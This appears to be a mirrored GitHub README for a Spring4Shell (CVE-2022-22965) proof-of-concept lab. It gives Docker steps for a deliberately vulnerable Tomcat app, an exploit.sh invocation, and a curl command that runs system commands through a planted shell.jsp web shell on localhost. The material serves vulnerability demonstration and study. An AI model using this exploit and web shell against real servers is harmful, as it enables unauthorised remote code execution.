Giters

jakabakos / spring4shell

PoC and exploit for CVE-2022-22965 Spring4Shell

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Spring4Shell

Spring4Shell (CVE-2022-22965) Proof Of Concept with a vulnerable Tomcat server with a vulnerable spring4shell application.

Details about this vulnerability

How to use

Build the image

docker build . -t spring4shell

Run the container

docker run -p 80:8080 spring4shell

You can also run it with the debugger port exposed if needed:

docker run -p 80:8080 –p 5005:5005 spring4shell

See the original blog post for the details of setting up a remote debugger in IntelliJ Idea!

Run the exploit

./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell

Then, you can run any command remotely like this:

curl http://localhost/spring4shell/shell.jsp?cmd=id --output -

...or by visiting the URL above.

About

PoC and exploit for CVE-2022-22965 Spring4Shell

Languages

Language:Shell 56.4%Language:Java 17.9%Language:HTML 9.8%Language:CSS 8.4%Language:Dockerfile 7.5%